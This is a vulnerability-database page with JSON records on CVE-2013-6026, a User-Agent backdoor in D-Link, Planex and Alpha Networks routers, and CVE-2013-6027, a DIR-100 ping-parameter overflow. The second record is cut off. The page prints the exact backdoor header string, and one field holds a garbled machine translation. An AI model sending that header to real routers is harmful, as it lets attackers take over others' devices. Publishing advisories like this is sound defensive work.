Vulnerabilities related to dlink - dir-100
var-201310-0388
Vulnerability from variot

The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013. Various D-Link routers allow administrative web actions if the HTTP request contains a specific User-Agent string. This backdoor allows an attacker to bypass password authentication and access the router's administrative web interface. Planex and Alpha Networks devices may also be affected. In addition, attacks exploiting this vulnerability were observed in October 2013. A third party may bypass authentication and change settings via the xmlset_roodkcableoj28840ybtide User-Agent HTTP header. The D-Link DIR-100 is a small broadband router with an integrated firewall function.

A backdoor vulnerability exists in firmware v1.13 used by the DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 and by several Planex routers (BRL-04UR and BRL-04CW). Multiple vendors are prone to a remote authentication-bypass vulnerability. This may aid in further attacks. The following are vulnerable: D-Link DIR-120, D-Link DI-624S, D-Link DI-524UP, D-Link DI-604S, D-Link DI-604UP, D-Link DI-604, D-Link DIR-100, D-Link TM-G5240, PLANEX COMMUNICATIONS BRL-04UR, PLANEX COMMUNICATIONS BRL-04R, and PLANEX COMMUNICATIONS BRL-04CW. The D-Link DIR-100 and similar models are router devices made by D-Link. The Planex BRL-04R and similar models are router devices made by the Japanese company Planex. The following products are affected: D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+; TM-G5240; Planex BRL-04R, BRL-04UR, BRL-04CW.



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201310-0388",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "vdsl asl-56552",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "alphanetworks",
        "version": null
      },
      {
        "model": "di-524up",
        "scope": null,
        "trust": 1.4,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "di-604+",
        "scope": null,
        "trust": 1.4,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "di-604s",
        "scope": null,
        "trust": 1.4,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "di-604up",
        "scope": null,
        "trust": 1.4,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "tm-g5240",
        "scope": null,
        "trust": 1.4,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "di-624s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "tm-g5240",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "di-604up",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "brl-04ur",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "planex",
        "version": null
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "di-604s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "di-524up",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "brl-04r",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "planex",
        "version": null
      },
      {
        "model": "brl-04cw",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "planex",
        "version": null
      },
      {
        "model": "di-604\\+",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dir-120",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "vdsl asl-55052",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "alphanetworks",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "vdsl 11n wireless router",
        "scope": null,
        "trust": 0.8,
        "vendor": "alpha",
        "version": null
      },
      {
        "model": "vdsl wired router",
        "scope": null,
        "trust": 0.8,
        "vendor": "alpha",
        "version": null
      },
      {
        "model": "di-624s",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-120",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "brl-04cw",
        "scope": null,
        "trust": 0.8,
        "vendor": "planex",
        "version": null
      },
      {
        "model": "brl-04r",
        "scope": null,
        "trust": 0.8,
        "vendor": "planex",
        "version": null
      },
      {
        "model": "brl-04ur",
        "scope": null,
        "trust": 0.8,
        "vendor": "planex",
        "version": null
      },
      {
        "model": "di-524",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.13"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13777"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-477"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6026"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:alphanetworks:vdsl_asl-56552",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:alphanetworks:vdsl_asl-55052",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:di-524up",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:di-604%2B",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:di-604s",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:di-604up",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:di-624s",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dir-100",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:dir-120",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:d-link:tm-g5240",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:planex:brl-04cw",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:planex:brl-04r",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:planex:brl-04ur",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004823"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Craig Heffner and /dev/ttyS0",
    "sources": [
      {
        "db": "BID",
        "id": "62990"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2013-6026",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2013-6026",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2013-13777",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-66028",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-6026",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-6026",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-13777",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201310-477",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-66028",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-13777"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66028"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-477"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6026"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013. Various D-Link routers allow administrative web actions if the HTTP request contains a specific User-Agent string. This backdoor allows an attacker to bypass password authentication and access the router\u0027s administrative web interface. Planex and Alpha Networks devices may also be affected. In addition, attacks on this vulnerability 2013 Year 10 Observed on the moon.By a third party xmlset_roodkcableoj28840ybtide User-Agent HTTP Authentication may be avoided and settings may be changed via the header. D-Link DIR-100 is a small broadband router with integrated firewall function. \r\n\r\n\r\nDIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604 +, TM-G5240 and several Planex routers BRL-04UR and BRL-04CW, the firmware used is v1.13 There is a backdoor vulnerability. Multiple vendors are prone to a remote authentication-bypass vulnerability. This  may aid in further attacks. \nThe following are vulnerable:\nD-Link DIR-120\nD-Link DI-624S\nD-Link DI-524UP\nD-Link DI-604S\nD-Link DI-604UP\nD-Link DI-604\nD-Link DIR-100\nD-Link TM-G5240\nPLANEX COMMUNICATIONS BRL-04UR\nPLANEX COMMUNICATIONS BRL-04R\nPLANEX COMMUNICATIONS BRL-04CW. D-Link DIR-100 and so on are all router devices of D-Link company. Planex BRL-04R etc. are the router equipment of Japan Planex Company. The following products are affected: D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+; TM-G5240; Planex BRL-04R, BRL-04UR, BRL-04CW",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-6026"
      },
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004823"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13777"
      },
      {
        "db": "BID",
        "id": "62990"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66028"
      }
    ],
    "trust": 3.24
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-6026",
        "trust": 3.4
      },
      {
        "db": "CERT/CC",
        "id": "VU#248083",
        "trust": 3.3
      },
      {
        "db": "BID",
        "id": "62990",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004823",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-477",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13777",
        "trust": 0.6
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-62565",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-66028",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13777"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66028"
      },
      {
        "db": "BID",
        "id": "62990"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-477"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6026"
      }
    ]
  },
  "id": "VAR-201310-0388",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-13777"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66028"
      }
    ],
    "trust": 1.3563492333333333
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-13777"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:18:43.896000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Update on Router Security issue",
        "trust": 0.8,
        "url": "http://www.dlink.com/uk/en/support/security"
      },
      {
        "title": "D-Link  and Planex/ router Web Repair measures for interface security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=234982"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-477"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66028"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004823"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6026"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
      },
      {
        "trust": 2.5,
        "url": "http://www.kb.cert.org/vuls/id/248083"
      },
      {
        "trust": 1.7,
        "url": "http://www.dlink.com/uk/en/support/security"
      },
      {
        "trust": 0.8,
        "url": "http://www.theregister.co.uk/2013/10/13/dlink_routers_have_admin_backdoor/"
      },
      {
        "trust": 0.8,
        "url": "http://www.dlink.com/uk/en/support/security "
      },
      {
        "trust": 0.8,
        "url": "http://blog.erratasec.com/2013/10/that-dlink-bug-masscan.html"
      },
      {
        "trust": 0.8,
        "url": "http://pastebin.com/vbig42vd"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6026"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6026"
      },
      {
        "trust": 0.6,
        "url": "http://www.solidot.org/story?sid=36791"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13777"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66028"
      },
      {
        "db": "BID",
        "id": "62990"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-477"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6026"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13777"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66028"
      },
      {
        "db": "BID",
        "id": "62990"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-477"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6026"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-10-17T00:00:00",
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "date": "2013-10-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-13777"
      },
      {
        "date": "2013-10-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-66028"
      },
      {
        "date": "2013-10-12T00:00:00",
        "db": "BID",
        "id": "62990"
      },
      {
        "date": "2013-10-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-004823"
      },
      {
        "date": "2013-10-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201310-477"
      },
      {
        "date": "2013-10-19T10:36:08.963000",
        "db": "NVD",
        "id": "CVE-2013-6026"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-07-29T00:00:00",
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "date": "2020-03-10T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-13777"
      },
      {
        "date": "2013-10-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-66028"
      },
      {
        "date": "2013-12-10T00:56:00",
        "db": "BID",
        "id": "62990"
      },
      {
        "date": "2013-10-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-004823"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201310-477"
      },
      {
        "date": "2024-11-21T01:58:38.767000",
        "db": "NVD",
        "id": "CVE-2013-6026"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-477"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link routers authenticate administrative access using specific User-Agent string",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-477"
      }
    ],
    "trust": 0.6
  }
}

var-201310-0389
Vulnerability from variot

Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi. Various D-Link routers allow administrative web actions if the HTTP request contains a specific User-Agent string. This backdoor allows an attacker to bypass password authentication and access the router's administrative web interface. Planex and Alpha Networks devices may also be affected. The D-Link DIR-100 routers are router devices. Triggering the vulnerability can crash the web interface. Multiple vendors are prone to a stack-based buffer-overflow vulnerability. Exploiting this vulnerability may allow attackers to execute arbitrary code in the context of the affected devices. The following are vulnerable: D-Link DIR-120, D-Link DI-624S, D-Link DI-524UP, D-Link DI-604S, D-Link DI-604UP, D-Link DI-604, D-Link DIR-100, D-Link TM-G5240, PLANEX COMMUNICATIONS BRL-04UR, PLANEX COMMUNICATIONS BRL-04R, and PLANEX COMMUNICATIONS BRL-04CW. The vulnerability is caused by the script's insufficient filtering of user-submitted parameters.



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201310-0389",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100 routers",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "di-524",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13957"
      },
      {
        "db": "BID",
        "id": "63234"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004824"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-478"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6027"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:d-link:dir-100",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004824"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Craig Heffner of /DEV/TTYS0",
    "sources": [
      {
        "db": "BID",
        "id": "63234"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2013-6027",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.5,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.8,
            "id": "CVE-2013-6027",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
